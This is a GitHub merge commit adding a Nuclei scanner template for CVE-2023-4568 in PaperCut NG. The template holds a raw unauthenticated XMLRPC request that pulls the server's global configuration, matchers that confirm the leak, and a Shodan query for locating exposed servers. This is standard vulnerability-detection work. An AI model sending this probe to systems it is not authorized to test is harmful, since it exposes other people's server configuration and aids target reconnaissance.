Merge pull request #8224 from projectdiscovery/CVE-2023-4568

Create CVE-2023-4568.yaml (PaperCut NG Unauthenticated XMLRPC Functionality 🔥 )
projectdiscovery · Sep 19, 2023 · 3115469 · 3115469
2 parents a9be84a + 681a1b3
commit 3115469
Showing 1 changed file with 53 additions and 0 deletions.
diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml
@@ -0,0 +1,53 @@
+id: CVE-2023-4568
+
+info:
+  name: PaperCut NG Unauthenticated XMLRPC Functionality
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
+    - https://www.tenable.com/security/research/tra-2023-31
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-4568
+    cwe-id: CWE-287
+    epss-score: 0.00046
+    epss-percentile: 0.14237
+    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: papercut
+    product: papercut_ng
+    shodan-query: html:"content="PaperCut""
+  tags: cve,cve2023,unauth,papercut
+
+http:
+  - raw:
+      - |
+        POST /rpc/clients/xmlrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type:text/xml
+
+        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'conf.ssl-port'
+          - 'conf.auth-ttl-default'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/xml
+
+      - type: status
+        status:
+          - 200